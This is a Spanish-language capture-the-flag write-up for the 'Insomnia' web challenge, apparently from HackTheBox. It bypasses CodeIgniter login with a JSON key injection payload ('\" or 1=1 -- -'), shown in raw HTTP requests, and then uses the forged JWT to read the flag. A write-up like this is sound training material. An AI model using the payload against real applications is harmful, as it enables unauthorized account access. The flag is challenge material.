Insomnia

Challenge Description

Welcome back to Insomnia Factory, where you might have to work under the enchanting glow of the moon, crafting dreams and weaving sleepless tales.

Categoria: Web
Dificultad: Fácil
Puntos: 20

Solution

En el archivo Insomnia/composer.json podemos ver lo que esta utilizando la aplicacion web.

    "require": {
        "php": "^7.4 || ^8.0",
        "codeigniter4/framework": "^4.0",
        "firebase/php-jwt": "6.2.0"
    },

Despues de investigar vulnerabilidades relacionadas con las tecnologias y versiones utilizadas llegamos al siguiente blog.

https://liveoverflow.com/authentication-bypassing-in-codeigniter-due-to-empty-where-clause/

Mandamos nuestro payload y obtenemos un token valido.

POST /index.php/login HTTP/1.1
Host: 94.237.58.228:42732
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://94.237.58.228:42732/index.php/login
Content-Type: application/json
Content-Length: 45
Origin: http://94.237.58.228:42732
Connection: close

{"username":"admin", "\" or 1=1 -- -":"asdf"}

Utilizando el token obtenemos la flag.

GET /index.php/profile HTTP/1.1
Host: 94.237.58.228:42732
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Referer: http://94.237.58.228:42732/index.php/login
Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE3MTU3MDIyMzMsImV4cCI6MTcxNTczODIzMywidXNlcm5hbWUiOiJhZG1pbmlzdHJhdG9yIn0.j9Cs-zbAK6qsSGRNyqAz4xHA1ASeWyN4iSkfgntZP4s
Upgrade-Insecure-Requests: 1

HTB{I_just_want_to_sleep_a_little_bit!!!!!}